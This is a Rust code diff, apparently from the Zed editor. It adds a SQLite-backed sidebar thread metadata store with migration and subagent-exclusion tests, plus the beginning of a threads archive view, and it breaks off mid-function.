+    /// every newly-created `AcpThread` so its metadata stays current.
+    fn new(db: ThreadMetadataDb, cx: &mut Context<Self>) -> Self {
+        let weak_store = cx.weak_entity();
+
+        cx.observe_new::<acp_thread::AcpThread>(move |thread, _window, cx| {
+            // Don't track subagent threads in the sidebar.
+            if thread.parent_session_id().is_some() {
+                return;
+            }
+
+            let thread_entity = cx.entity();
+
+            // Drop the event subscription when the thread entity is released.
+            cx.on_release({
+                let weak_store = weak_store.clone();
+                move |thread, cx| {
+                    weak_store
+                        .update(cx, |store, _cx| {
+                            store.session_subscriptions.remove(thread.session_id());
+                        })
+                        .ok();
+                }
+            })
+            .detach();
+
+            weak_store
+                .update(cx, |this, cx| {
+                    let subscription = cx.subscribe(&thread_entity, Self::handle_thread_update);
+                    this.session_subscriptions
+                        .insert(thread.session_id().clone(), subscription);
+                })
+                .ok();
+        })
+        .detach();
+
+        let mut this = Self {
+            db,
+            threads: Vec::new(),
+            threads_by_paths: HashMap::default(),
+            reload_task: None,
+            session_subscriptions: HashMap::default(),
+        };
+        let _ = this.reload(cx);
+        this
+    }
+
+    /// Re-save a thread's metadata whenever an event indicates it may have
+    /// changed (new entries, title updates, stop/error states, etc.).
+    fn handle_thread_update(
+        &mut self,
+        thread: Entity<acp_thread::AcpThread>,
+        event: &acp_thread::AcpThreadEvent,
+        cx: &mut Context<Self>,
+    ) {
+        // Don't track subagent threads in the sidebar.
+        if thread.read(cx).parent_session_id().is_some() {
+            return;
+        }
+
+        match event {
+            acp_thread::AcpThreadEvent::NewEntry
+            | acp_thread::AcpThreadEvent::TitleUpdated
+            | acp_thread::AcpThreadEvent::EntryUpdated(_)
+            | acp_thread::AcpThreadEvent::EntriesRemoved(_)
+            | acp_thread::AcpThreadEvent::ToolAuthorizationRequested(_)
+            | acp_thread::AcpThreadEvent::ToolAuthorizationReceived(_)
+            | acp_thread::AcpThreadEvent::Retry(_)
+            | acp_thread::AcpThreadEvent::Stopped(_)
+            | acp_thread::AcpThreadEvent::Error
+            | acp_thread::AcpThreadEvent::LoadError(_)
+            | acp_thread::AcpThreadEvent::Refusal => {
+                let metadata = ThreadMetadata::from_thread(&thread, cx);
+                self.save(metadata, cx).detach_and_log_err(cx);
+            }
+            _ => {}
+        }
+    }
+}
+
+impl Global for SidebarThreadMetadataStore {}
+
+struct ThreadMetadataDb(ThreadSafeConnection);
+
+impl Domain for ThreadMetadataDb {
+    const NAME: &str = stringify!(ThreadMetadataDb);
+
+    // Single-migration schema. Timestamps are RFC 3339 TEXT; `folder_paths`
+    // plus `folder_paths_order` hold a serialized `PathList` (see `save`).
+    const MIGRATIONS: &[&str] = &[sql!(
+        CREATE TABLE IF NOT EXISTS sidebar_threads(
+            session_id TEXT PRIMARY KEY,
+            agent_id TEXT,
+            title TEXT NOT NULL,
+            updated_at TEXT NOT NULL,
+            created_at TEXT,
+            folder_paths TEXT,
+            folder_paths_order TEXT
+        ) STRICT;
+    )];
+}
+
+db::static_connection!(ThreadMetadataDb, []);
+
+impl ThreadMetadataDb {
+    /// Whether `sidebar_threads` has no rows — used as the "migration has not
+    /// run yet" guard in `migrate_thread_metadata`.
+    pub fn is_empty(&self) -> anyhow::Result<bool> {
+        self.select::<i64>("SELECT COUNT(*) FROM sidebar_threads")?()
+            .map(|counts| counts.into_iter().next().unwrap_or_default() == 0)
+    }
+
+    /// List all sidebar thread metadata, ordered by updated_at descending.
+    pub fn list(&self) -> anyhow::Result<Vec<ThreadMetadata>> {
+        self.select::<ThreadMetadata>(
+            "SELECT session_id, agent_id, title, updated_at, created_at, folder_paths, folder_paths_order \
+             FROM sidebar_threads \
+             ORDER BY updated_at DESC"
+        )?()
+    }
+
+    /// Upsert metadata for a thread.
+    pub async fn save(&self, row: ThreadMetadata) -> anyhow::Result<()> {
+        let id = row.session_id.0.clone();
+        let agent_id = row.agent_id.as_ref().map(|id| id.0.to_string());
+        let title = row.title.to_string();
+        // Timestamps are stored as RFC 3339 text (parsed back in `Column`).
+        let updated_at = row.updated_at.to_rfc3339();
+        let created_at = row.created_at.map(|dt| dt.to_rfc3339());
+        let serialized = row.folder_paths.serialize();
+        // Empty path lists are stored as NULL in both columns.
+        let (folder_paths, folder_paths_order) = if row.folder_paths.is_empty() {
+            (None, None)
+        } else {
+            (Some(serialized.paths), Some(serialized.order))
+        };
+
+        self.write(move |conn| {
+            // `created_at` is deliberately absent from the UPDATE list so the
+            // original insert's value survives later upserts.
+            let sql = "INSERT INTO sidebar_threads(session_id, agent_id, title, updated_at, created_at, folder_paths, folder_paths_order) \
+                VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7) \
+                ON CONFLICT(session_id) DO UPDATE SET \
+                    agent_id = excluded.agent_id, \
+                    title = excluded.title, \
+                    updated_at = excluded.updated_at, \
+                    folder_paths = excluded.folder_paths, \
+                    folder_paths_order = excluded.folder_paths_order";
+            let mut stmt = Statement::prepare(conn, sql)?;
+            let mut i = stmt.bind(&id, 1)?;
+            i = stmt.bind(&agent_id, i)?;
+            i = stmt.bind(&title, i)?;
+            i = stmt.bind(&updated_at, i)?;
+            i = stmt.bind(&created_at, i)?;
+            i = stmt.bind(&folder_paths, i)?;
+            stmt.bind(&folder_paths_order, i)?;
+            stmt.exec()
+        })
+        .await
+    }
+
+    /// Delete metadata for a single thread.
+    pub async fn delete(&self, session_id: acp::SessionId) -> anyhow::Result<()> {
+        let id = session_id.0.clone();
+        self.write(move |conn| {
+            let mut stmt =
+                Statement::prepare(conn, "DELETE FROM sidebar_threads WHERE session_id = ?")?;
+            stmt.bind(&id, 1)?;
+            stmt.exec()
+        })
+        .await
+    }
+}
+
+impl Column for ThreadMetadata {
+    /// Decode one `sidebar_threads` row starting at `start_index`, returning
+    /// the metadata plus the index of the next unread column.
+    fn column(statement: &mut Statement, start_index: i32) -> anyhow::Result<(Self, i32)> {
+        let (id, next): (Arc<str>, i32) = Column::column(statement, start_index)?;
+        let (agent_id, next): (Option<String>, i32) = Column::column(statement, next)?;
+        let (title, next): (String, i32) = Column::column(statement, next)?;
+        let (updated_at_str, next): (String, i32) = Column::column(statement, next)?;
+        let (created_at_str, next): (Option<String>, i32) = Column::column(statement, next)?;
+        let (folder_paths_str, next): (Option<String>, i32) = Column::column(statement, next)?;
+        let (folder_paths_order_str, next): (Option<String>, i32) =
+            Column::column(statement, next)?;
+
+        // Timestamps are stored as RFC 3339 strings (see `ThreadMetadataDb::save`).
+        let updated_at = DateTime::parse_from_rfc3339(&updated_at_str)?.with_timezone(&Utc);
+        let created_at = created_at_str
+            .as_deref()
+            .map(DateTime::parse_from_rfc3339)
+            .transpose()?
+            .map(|dt| dt.with_timezone(&Utc));
+
+        // `folder_paths`/`folder_paths_order` are written together (both NULL
+        // for an empty list); a missing order degrades to the default.
+        let folder_paths = folder_paths_str
+            .map(|paths| {
+                PathList::deserialize(&util::path_list::SerializedPathList {
+                    paths,
+                    order: folder_paths_order_str.unwrap_or_default(),
+                })
+            })
+            .unwrap_or_default();
+
+        Ok((
+            ThreadMetadata {
+                session_id: acp::SessionId::new(id),
+                // Function passed directly — no closure needed (clippy: redundant_closure).
+                agent_id: agent_id.map(AgentId::new),
+                title: title.into(),
+                updated_at,
+                created_at,
+                folder_paths,
+            },
+            next,
+        ))
+    }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use acp_thread::{AgentConnection, StubAgentConnection};
+ use action_log::ActionLog;
+ use agent::DbThread;
+ use agent_client_protocol as acp;
+ use feature_flags::FeatureFlagAppExt;
+ use gpui::TestAppContext;
+ use project::FakeFs;
+ use project::Project;
+ use std::path::Path;
+ use std::rc::Rc;
+
+    // Minimal `DbThread` fixture: only `title` and `updated_at` matter to
+    // these tests; everything else is defaulted/empty.
+    fn make_db_thread(title: &str, updated_at: DateTime<Utc>) -> DbThread {
+        DbThread {
+            title: title.to_string().into(),
+            messages: Vec::new(),
+            updated_at,
+            detailed_summary: None,
+            initial_project_snapshot: None,
+            cumulative_token_usage: Default::default(),
+            request_token_usage: Default::default(),
+            model: None,
+            profile: None,
+            imported: false,
+            subagent_context: None,
+            speed: None,
+            thinking_enabled: false,
+            thinking_effort: None,
+            draft_prompt: None,
+            ui_scroll_position: None,
+        }
+    }
+
+    // `ThreadMetadata` fixture for a native (agent-less) thread with
+    // `created_at == updated_at`.
+    fn make_metadata(
+        session_id: &str,
+        title: &str,
+        updated_at: DateTime<Utc>,
+        folder_paths: PathList,
+    ) -> ThreadMetadata {
+        ThreadMetadata {
+            session_id: acp::SessionId::new(session_id),
+            agent_id: None,
+            title: title.to_string().into(),
+            updated_at,
+            created_at: Some(updated_at),
+            folder_paths,
+        }
+    }
+
+    // Rows written to the DB before `init_global` must appear in the store's
+    // caches (both the flat list and the per-path index) after the initial
+    // reload, newest-first.
+    #[gpui::test]
+    async fn test_store_initializes_cache_from_database(cx: &mut TestAppContext) {
+        let first_paths = PathList::new(&[Path::new("/project-a")]);
+        let second_paths = PathList::new(&[Path::new("/project-b")]);
+        let now = Utc::now();
+        let older = now - chrono::Duration::seconds(1);
+
+        // Open the same per-test DB that `init_global` will use below.
+        let thread = std::thread::current();
+        let test_name = thread.name().unwrap_or("unknown_test");
+        let db_name = format!("THREAD_METADATA_DB_{}", test_name);
+        let db = ThreadMetadataDb(smol::block_on(db::open_test_db::<ThreadMetadataDb>(
+            &db_name,
+        )));
+
+        db.save(make_metadata(
+            "session-1",
+            "First Thread",
+            now,
+            first_paths.clone(),
+        ))
+        .await
+        .unwrap();
+        db.save(make_metadata(
+            "session-2",
+            "Second Thread",
+            older,
+            second_paths.clone(),
+        ))
+        .await
+        .unwrap();
+
+        cx.update(|cx| {
+            let settings_store = settings::SettingsStore::test(cx);
+            cx.set_global(settings_store);
+            cx.update_flags(true, vec!["agent-v2".to_string()]);
+            SidebarThreadMetadataStore::init_global(cx);
+        });
+
+        cx.run_until_parked();
+
+        cx.update(|cx| {
+            let store = SidebarThreadMetadataStore::global(cx);
+            let store = store.read(cx);
+
+            // Newest-first ordering: session-1 (now) before session-2 (older).
+            let entry_ids = store
+                .entry_ids()
+                .map(|session_id| session_id.0.to_string())
+                .collect::<Vec<_>>();
+            assert_eq!(entry_ids, vec!["session-1", "session-2"]);
+
+            let first_path_entries = store
+                .entries_for_path(&first_paths)
+                .map(|entry| entry.session_id.0.to_string())
+                .collect::<Vec<_>>();
+            assert_eq!(first_path_entries, vec!["session-1"]);
+
+            let second_path_entries = store
+                .entries_for_path(&second_paths)
+                .map(|entry| entry.session_id.0.to_string())
+                .collect::<Vec<_>>();
+            assert_eq!(second_path_entries, vec!["session-2"]);
+        });
+    }
+
+    // The caches must track mutations: saving, re-saving under a different
+    // path list (a "move"), and deleting all refresh the per-path index.
+    #[gpui::test]
+    async fn test_store_cache_updates_after_save_and_delete(cx: &mut TestAppContext) {
+        cx.update(|cx| {
+            let settings_store = settings::SettingsStore::test(cx);
+            cx.set_global(settings_store);
+            cx.update_flags(true, vec!["agent-v2".to_string()]);
+            SidebarThreadMetadataStore::init_global(cx);
+        });
+
+        let first_paths = PathList::new(&[Path::new("/project-a")]);
+        let second_paths = PathList::new(&[Path::new("/project-b")]);
+        let initial_time = Utc::now();
+        let updated_time = initial_time + chrono::Duration::seconds(1);
+
+        let initial_metadata = make_metadata(
+            "session-1",
+            "First Thread",
+            initial_time,
+            first_paths.clone(),
+        );
+
+        let second_metadata = make_metadata(
+            "session-2",
+            "Second Thread",
+            initial_time,
+            second_paths.clone(),
+        );
+
+        cx.update(|cx| {
+            let store = SidebarThreadMetadataStore::global(cx);
+            store.update(cx, |store, cx| {
+                store.save(initial_metadata, cx).detach();
+                store.save(second_metadata, cx).detach();
+            });
+        });
+
+        cx.run_until_parked();
+
+        cx.update(|cx| {
+            let store = SidebarThreadMetadataStore::global(cx);
+            let store = store.read(cx);
+
+            let first_path_entries = store
+                .entries_for_path(&first_paths)
+                .map(|entry| entry.session_id.0.to_string())
+                .collect::<Vec<_>>();
+            assert_eq!(first_path_entries, vec!["session-1"]);
+
+            let second_path_entries = store
+                .entries_for_path(&second_paths)
+                .map(|entry| entry.session_id.0.to_string())
+                .collect::<Vec<_>>();
+            assert_eq!(second_path_entries, vec!["session-2"]);
+        });
+
+        // Re-save session-1 under project-b's paths: it must leave the
+        // project-a index and join project-b's (upsert on session_id).
+        let moved_metadata = make_metadata(
+            "session-1",
+            "First Thread",
+            updated_time,
+            second_paths.clone(),
+        );
+
+        cx.update(|cx| {
+            let store = SidebarThreadMetadataStore::global(cx);
+            store.update(cx, |store, cx| {
+                store.save(moved_metadata, cx).detach();
+            });
+        });
+
+        cx.run_until_parked();
+
+        cx.update(|cx| {
+            let store = SidebarThreadMetadataStore::global(cx);
+            let store = store.read(cx);
+
+            let entry_ids = store
+                .entry_ids()
+                .map(|session_id| session_id.0.to_string())
+                .collect::<Vec<_>>();
+            assert_eq!(entry_ids, vec!["session-1", "session-2"]);
+
+            let first_path_entries = store
+                .entries_for_path(&first_paths)
+                .map(|entry| entry.session_id.0.to_string())
+                .collect::<Vec<_>>();
+            assert!(first_path_entries.is_empty());
+
+            let second_path_entries = store
+                .entries_for_path(&second_paths)
+                .map(|entry| entry.session_id.0.to_string())
+                .collect::<Vec<_>>();
+            assert_eq!(second_path_entries, vec!["session-1", "session-2"]);
+        });
+
+        cx.update(|cx| {
+            let store = SidebarThreadMetadataStore::global(cx);
+            store.update(cx, |store, cx| {
+                store.delete(acp::SessionId::new("session-2"), cx).detach();
+            });
+        });
+
+        cx.run_until_parked();
+
+        cx.update(|cx| {
+            let store = SidebarThreadMetadataStore::global(cx);
+            let store = store.read(cx);
+
+            let entry_ids = store
+                .entry_ids()
+                .map(|session_id| session_id.0.to_string())
+                .collect::<Vec<_>>();
+            assert_eq!(entry_ids, vec!["session-1"]);
+
+            let second_path_entries = store
+                .entries_for_path(&second_paths)
+                .map(|entry| entry.session_id.0.to_string())
+                .collect::<Vec<_>>();
+            assert_eq!(second_path_entries, vec!["session-1"]);
+        });
+    }
+
+    // End-to-end migration: 12 project-a threads, 3 project-b threads, and a
+    // projectless thread go into the legacy store; migration must keep the 10
+    // newest per project and drop the projectless one.
+    #[gpui::test]
+    async fn test_migrate_thread_metadata(cx: &mut TestAppContext) {
+        cx.update(|cx| {
+            ThreadStore::init_global(cx);
+            SidebarThreadMetadataStore::init_global(cx);
+        });
+
+        // Verify the cache is empty before migration
+        let list = cx.update(|cx| {
+            let store = SidebarThreadMetadataStore::global(cx);
+            store.read(cx).entries().collect::<Vec<_>>()
+        });
+        assert_eq!(list.len(), 0);
+
+        let project_a_paths = PathList::new(&[Path::new("/project-a")]);
+        let project_b_paths = PathList::new(&[Path::new("/project-b")]);
+        let now = Utc::now();
+
+        // 12 threads for project-a (two over the per-project cap), each one
+        // second newer than the last so ordering is deterministic.
+        for index in 0..12 {
+            let updated_at = now + chrono::Duration::seconds(index as i64);
+            let session_id = format!("project-a-session-{index}");
+            let title = format!("Project A Thread {index}");
+
+            let save_task = cx.update(|cx| {
+                let thread_store = ThreadStore::global(cx);
+                let session_id = session_id.clone();
+                let title = title.clone();
+                let project_a_paths = project_a_paths.clone();
+                thread_store.update(cx, |store, cx| {
+                    store.save_thread(
+                        acp::SessionId::new(session_id),
+                        make_db_thread(&title, updated_at),
+                        project_a_paths,
+                        cx,
+                    )
+                })
+            });
+            save_task.await.unwrap();
+            cx.run_until_parked();
+        }
+
+        // 3 threads for project-b, all newer than project-a's.
+        for index in 0..3 {
+            let updated_at = now + chrono::Duration::seconds(100 + index as i64);
+            let session_id = format!("project-b-session-{index}");
+            let title = format!("Project B Thread {index}");
+
+            let save_task = cx.update(|cx| {
+                let thread_store = ThreadStore::global(cx);
+                let session_id = session_id.clone();
+                let title = title.clone();
+                let project_b_paths = project_b_paths.clone();
+                thread_store.update(cx, |store, cx| {
+                    store.save_thread(
+                        acp::SessionId::new(session_id),
+                        make_db_thread(&title, updated_at),
+                        project_b_paths,
+                        cx,
+                    )
+                })
+            });
+            save_task.await.unwrap();
+            cx.run_until_parked();
+        }
+
+        // A thread with no project — migration must skip it.
+        let save_projectless = cx.update(|cx| {
+            let thread_store = ThreadStore::global(cx);
+            thread_store.update(cx, |store, cx| {
+                store.save_thread(
+                    acp::SessionId::new("projectless-session"),
+                    make_db_thread("Projectless Thread", now + chrono::Duration::seconds(200)),
+                    PathList::default(),
+                    cx,
+                )
+            })
+        });
+        save_projectless.await.unwrap();
+        cx.run_until_parked();
+
+        // Run migration
+        cx.update(|cx| {
+            migrate_thread_metadata(cx);
+        });
+
+        cx.run_until_parked();
+
+        // Verify the metadata was migrated, limited to 10 per project, and
+        // projectless threads were skipped.
+        let list = cx.update(|cx| {
+            let store = SidebarThreadMetadataStore::global(cx);
+            store.read(cx).entries().collect::<Vec<_>>()
+        });
+        // 10 (capped) from project-a + 3 from project-b.
+        assert_eq!(list.len(), 13);
+
+        assert!(
+            list.iter()
+                .all(|metadata| !metadata.folder_paths.is_empty())
+        );
+        assert!(
+            list.iter()
+                .all(|metadata| metadata.session_id.0.as_ref() != "projectless-session")
+        );
+
+        // The cap keeps the 10 NEWEST project-a threads (11 down to 2).
+        let project_a_entries = list
+            .iter()
+            .filter(|metadata| metadata.folder_paths == project_a_paths)
+            .collect::<Vec<_>>();
+        assert_eq!(project_a_entries.len(), 10);
+        assert_eq!(
+            project_a_entries
+                .iter()
+                .map(|metadata| metadata.session_id.0.as_ref())
+                .collect::<Vec<_>>(),
+            vec![
+                "project-a-session-11",
+                "project-a-session-10",
+                "project-a-session-9",
+                "project-a-session-8",
+                "project-a-session-7",
+                "project-a-session-6",
+                "project-a-session-5",
+                "project-a-session-4",
+                "project-a-session-3",
+                "project-a-session-2",
+            ]
+        );
+        assert!(
+            project_a_entries
+                .iter()
+                .all(|metadata| metadata.agent_id.is_none())
+        );
+
+        let project_b_entries = list
+            .iter()
+            .filter(|metadata| metadata.folder_paths == project_b_paths)
+            .collect::<Vec<_>>();
+        assert_eq!(project_b_entries.len(), 3);
+        assert_eq!(
+            project_b_entries
+                .iter()
+                .map(|metadata| metadata.session_id.0.as_ref())
+                .collect::<Vec<_>>(),
+            vec![
+                "project-b-session-2",
+                "project-b-session-1",
+                "project-b-session-0",
+            ]
+        );
+        assert!(
+            project_b_entries
+                .iter()
+                .all(|metadata| metadata.agent_id.is_none())
+        );
+    }
+
+    // The `db.is_empty()` guard: when the metadata store already has rows,
+    // migration must be a no-op even if the legacy store has threads.
+    #[gpui::test]
+    async fn test_migrate_thread_metadata_skips_when_data_exists(cx: &mut TestAppContext) {
+        cx.update(|cx| {
+            ThreadStore::init_global(cx);
+            SidebarThreadMetadataStore::init_global(cx);
+        });
+
+        // Pre-populate the metadata store with existing data
+        let existing_metadata = ThreadMetadata {
+            session_id: acp::SessionId::new("existing-session"),
+            agent_id: None,
+            title: "Existing Thread".into(),
+            updated_at: Utc::now(),
+            created_at: Some(Utc::now()),
+            folder_paths: PathList::default(),
+        };
+
+        cx.update(|cx| {
+            let store = SidebarThreadMetadataStore::global(cx);
+            store.update(cx, |store, cx| {
+                store.save(existing_metadata, cx).detach();
+            });
+        });
+
+        cx.run_until_parked();
+
+        // Add an entry to native thread store that should NOT be migrated
+        let save_task = cx.update(|cx| {
+            let thread_store = ThreadStore::global(cx);
+            thread_store.update(cx, |store, cx| {
+                store.save_thread(
+                    acp::SessionId::new("native-session"),
+                    make_db_thread("Native Thread", Utc::now()),
+                    PathList::default(),
+                    cx,
+                )
+            })
+        });
+        save_task.await.unwrap();
+        cx.run_until_parked();
+
+        // Run migration - should skip because metadata store is not empty
+        cx.update(|cx| {
+            migrate_thread_metadata(cx);
+        });
+
+        cx.run_until_parked();
+
+        // Verify only the existing metadata is present (migration was skipped)
+        let list = cx.update(|cx| {
+            let store = SidebarThreadMetadataStore::global(cx);
+            store.read(cx).entries().collect::<Vec<_>>()
+        });
+        assert_eq!(list.len(), 1);
+        assert_eq!(list[0].session_id.0.as_ref(), "existing-session");
+    }
+
+    // Threads created with a parent session id (subagents) must never be
+    // persisted by the store's AcpThread observers.
+    #[gpui::test]
+    async fn test_subagent_threads_excluded_from_sidebar_metadata(cx: &mut TestAppContext) {
+        cx.update(|cx| {
+            let settings_store = settings::SettingsStore::test(cx);
+            cx.set_global(settings_store);
+            cx.update_flags(true, vec!["agent-v2".to_string()]);
+            ThreadStore::init_global(cx);
+            SidebarThreadMetadataStore::init_global(cx);
+        });
+
+        let fs = FakeFs::new(cx.executor());
+        let project = Project::test(fs, None::<&Path>, cx).await;
+        let connection = Rc::new(StubAgentConnection::new());
+
+        // Create a regular (non-subagent) AcpThread.
+        let regular_thread = cx
+            .update(|cx| {
+                connection
+                    .clone()
+                    .new_session(project.clone(), PathList::default(), cx)
+            })
+            .await
+            .unwrap();
+
+        let regular_session_id = cx.read(|cx| regular_thread.read(cx).session_id().clone());
+
+        // Set a title on the regular thread to trigger a save via handle_thread_update.
+        cx.update(|cx| {
+            regular_thread.update(cx, |thread, cx| {
+                thread.set_title("Regular Thread".into(), cx).detach();
+            });
+        });
+        cx.run_until_parked();
+
+        // Create a subagent AcpThread (parent session id = the regular thread).
+        let subagent_session_id = acp::SessionId::new("subagent-session");
+        let subagent_thread = cx.update(|cx| {
+            let action_log = cx.new(|_| ActionLog::new(project.clone()));
+            cx.new(|cx| {
+                acp_thread::AcpThread::new(
+                    Some(regular_session_id.clone()),
+                    Some("Subagent Thread".into()),
+                    None,
+                    connection.clone(),
+                    project.clone(),
+                    action_log,
+                    subagent_session_id.clone(),
+                    watch::Receiver::constant(acp::PromptCapabilities::new()),
+                    cx,
+                )
+            })
+        });
+
+        // Set a title on the subagent thread to trigger handle_thread_update.
+        cx.update(|cx| {
+            subagent_thread.update(cx, |thread, cx| {
+                thread
+                    .set_title("Subagent Thread Title".into(), cx)
+                    .detach();
+            });
+        });
+        cx.run_until_parked();
+
+        // List all metadata from the store cache.
+        let list = cx.update(|cx| {
+            let store = SidebarThreadMetadataStore::global(cx);
+            store.read(cx).entries().collect::<Vec<_>>()
+        });
+
+        // The subagent thread should NOT appear in the sidebar metadata.
+        // Only the regular thread should be listed.
+        assert_eq!(
+            list.len(),
+            1,
+            "Expected only the regular thread in sidebar metadata, \
+             but found {} entries (subagent threads are leaking into the sidebar)",
+            list.len(),
+        );
+        assert_eq!(list[0].session_id, regular_session_id);
+        assert_eq!(list[0].title.as_ref(), "Regular Thread");
+    }
+}
@@ -0,0 +1,978 @@
+use std::sync::Arc;
+
+use crate::{
+ Agent, RemoveSelectedThread, agent_connection_store::AgentConnectionStore,
+ thread_history::ThreadHistory,
+};
+use acp_thread::AgentSessionInfo;
+use agent::ThreadStore;
+use agent_client_protocol as acp;
+use chrono::{DateTime, Datelike as _, Local, NaiveDate, TimeDelta, Utc};
+use editor::Editor;
+use fs::Fs;
+use gpui::{
+ AnyElement, App, Context, Entity, EventEmitter, FocusHandle, Focusable, ListState, Render,
+ SharedString, Subscription, Task, Window, list, prelude::*, px,
+};
+use itertools::Itertools as _;
+use menu::{Confirm, SelectFirst, SelectLast, SelectNext, SelectPrevious};
+use project::{AgentId, AgentServerStore};
+use theme::ActiveTheme;
+use ui::{
+ ButtonLike, CommonAnimationExt, ContextMenu, ContextMenuEntry, Divider, HighlightedLabel,
+ KeyBinding, PopoverMenu, PopoverMenuHandle, TintColor, Tooltip, WithScrollbar, prelude::*,
+ utils::platform_title_bar_height,
+};
+use util::ResultExt as _;
+use zed_actions::agents_sidebar::FocusSidebarFilter;
+use zed_actions::editor::{MoveDown, MoveUp};
+
+#[derive(Clone)]
+enum ArchiveListItem {
+ BucketSeparator(TimeBucket),
+ Entry {
+ session: AgentSessionInfo,
+ highlight_positions: Vec<usize>,
+ },
+}
+
+#[derive(Clone, Copy, Debug, PartialEq, Eq)]
+enum TimeBucket {
+ Today,
+ Yesterday,
+ ThisWeek,
+ PastWeek,
+ Older,
+}
+
+impl TimeBucket {
+ fn from_dates(reference: NaiveDate, date: NaiveDate) -> Self {
+ if date == reference {
+ return TimeBucket::Today;
+ }
+ if date == reference - TimeDelta::days(1) {
+ return TimeBucket::Yesterday;
+ }
+ let week = date.iso_week();
+ if reference.iso_week() == week {
+ return TimeBucket::ThisWeek;
+ }
+ let last_week = (reference - TimeDelta::days(7)).iso_week();
+ if week == last_week {
+ return TimeBucket::PastWeek;
+ }
+ TimeBucket::Older
+ }
+
+ fn label(&self) -> &'static str {
+ match self {
+ TimeBucket::Today => "Today",
+ TimeBucket::Yesterday => "Yesterday",
+ TimeBucket::ThisWeek => "This Week",
+ TimeBucket::PastWeek => "Past Week",
+ TimeBucket::Older => "Older",
+ }
+ }
+}
+
+fn fuzzy_match_positions(query: &str, text: &str) -> Option<Vec<usize>> {
+ let query = query.to_lowercase();
+ let text_lower = text.to_lowercase();
+ let mut positions = Vec::new();
+ let mut query_chars = query.chars().peekable();
+ for (i, c) in text_lower.chars().enumerate() {
+ if query_chars.peek() == Some(&c) {
+ positions.push(i);
+ query_chars.next();
+ }
+ }
+ if query_chars.peek().is_none() {
+ Some(positions)
+ } else {
+ None
+ }
+}
+
+fn archive_empty_state_message(
+ has_history: bool,
+ is_empty: bool,
+ has_query: bool,
+) -> Option<&'static str> {
+ if !is_empty {
+ None
+ } else if !has_history {
+ Some("This agent does not support viewing archived threads.")
+ } else if has_query {
+ Some("No threads match your search.")
+ } else {
+ Some("No archived threads yet.")
+ }
+}
+
+pub enum ThreadsArchiveViewEvent {
+ Close,
+ Unarchive {
+ agent: Agent,
+ session_info: AgentSessionInfo,
+ },
+}
+
+impl EventEmitter<ThreadsArchiveViewEvent> for ThreadsArchiveView {}
+
+pub struct ThreadsArchiveView {
+ agent_connection_store: Entity<AgentConnectionStore>,
+ agent_server_store: Entity<AgentServerStore>,
+ thread_store: Entity<ThreadStore>,
+ fs: Arc<dyn Fs>,
+ history: Option<Entity<ThreadHistory>>,
+ _history_subscription: Subscription,
+ selected_agent: Agent,
+ focus_handle: FocusHandle,
+ list_state: ListState,
+ items: Vec<ArchiveListItem>,
+ selection: Option<usize>,
+ hovered_index: Option<usize>,
+ filter_editor: Entity<Editor>,
+ _subscriptions: Vec<gpui::Subscription>,
+ selected_agent_menu: PopoverMenuHandle<ContextMenu>,
+ _refresh_history_task: Task<()>,
+ is_loading: bool,
+}
+
+impl ThreadsArchiveView {
+ pub fn new(
+ agent_connection_store: Entity<AgentConnectionStore>,
+ agent_server_store: Entity<AgentServerStore>,
+ thread_store: Entity<ThreadStore>,
+ fs: Arc<dyn Fs>,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Self {
+ let focus_handle = cx.focus_handle();
+
+ let filter_editor = cx.new(|cx| {
+ let mut editor = Editor::single_line(window, cx);
+ editor.set_placeholder_text("Search archive…", window, cx);
+ editor
+ });
+
+ let filter_editor_subscription =
+ cx.subscribe(&filter_editor, |this: &mut Self, _, event, cx| {
+ if let editor::EditorEvent::BufferEdited = event {
+ this.update_items(cx);
+ }
+ });
+
+ let filter_focus_handle = filter_editor.read(cx).focus_handle(cx);
+ cx.on_focus_in(
+ &filter_focus_handle,
+ window,
+ |this: &mut Self, _window, cx| {
+ if this.selection.is_some() {
+ this.selection = None;
+ cx.notify();
+ }
+ },
+ )
+ .detach();
+
+ cx.on_focus_out(&focus_handle, window, |this: &mut Self, _, _window, cx| {
+ this.selection = None;
+ cx.notify();
+ })
+ .detach();
+
+ let mut this = Self {
+ agent_connection_store,
+ agent_server_store,
+ thread_store,
+ fs,
+ history: None,
+ _history_subscription: Subscription::new(|| {}),
+ selected_agent: Agent::NativeAgent,
+ focus_handle,
+ list_state: ListState::new(0, gpui::ListAlignment::Top, px(1000.)),
+ items: Vec::new(),
+ selection: None,
+ hovered_index: None,
+ filter_editor,
+ _subscriptions: vec![filter_editor_subscription],
+ selected_agent_menu: PopoverMenuHandle::default(),
+ _refresh_history_task: Task::ready(()),
+ is_loading: true,
+ };
+ this.set_selected_agent(Agent::NativeAgent, window, cx);
+ this
+ }
+
+ pub fn has_selection(&self) -> bool {
+ self.selection.is_some()
+ }
+
+ pub fn clear_selection(&mut self) {
+ self.selection = None;
+ }
+
+ pub fn focus_filter_editor(&self, window: &mut Window, cx: &mut App) {
+ let handle = self.filter_editor.read(cx).focus_handle(cx);
+ handle.focus(window, cx);
+ }
+
+ fn set_selected_agent(&mut self, agent: Agent, window: &mut Window, cx: &mut Context<Self>) {
+ self.selected_agent = agent.clone();
+ self.is_loading = true;
+ self.reset_history_subscription();
+ self.history = None;
+ self.items.clear();
+ self.selection = None;
+ self.list_state.reset(0);
+ self.reset_filter_editor_text(window, cx);
+
+ let server = agent.server(self.fs.clone(), self.thread_store.clone());
+ let connection = self
+ .agent_connection_store
+ .update(cx, |store, cx| store.request_connection(agent, server, cx));
+
+ let task = connection.read(cx).wait_for_connection();
+ self._refresh_history_task = cx.spawn(async move |this, cx| {
+ if let Some(state) = task.await.log_err() {
+ this.update(cx, |this, cx| this.set_history(state.history, cx))
+ .ok();
+ }
+ });
+
+ cx.notify();
+ }
+
+ fn reset_history_subscription(&mut self) {
+ self._history_subscription = Subscription::new(|| {});
+ }
+
+ fn set_history(&mut self, history: Option<Entity<ThreadHistory>>, cx: &mut Context<Self>) {
+ self.reset_history_subscription();
+
+ if let Some(history) = &history {
+ self._history_subscription = cx.observe(history, |this, _, cx| {
+ this.update_items(cx);
+ });
+ history.update(cx, |history, cx| {
+ history.refresh_full_history(cx);
+ });
+ }
+ self.history = history;
+ self.is_loading = false;
+ self.update_items(cx);
+ cx.notify();
+ }
+
+ fn update_items(&mut self, cx: &mut Context<Self>) {
+ let sessions = self
+ .history
+ .as_ref()
+ .map(|h| h.read(cx).sessions().to_vec())
+ .unwrap_or_default();
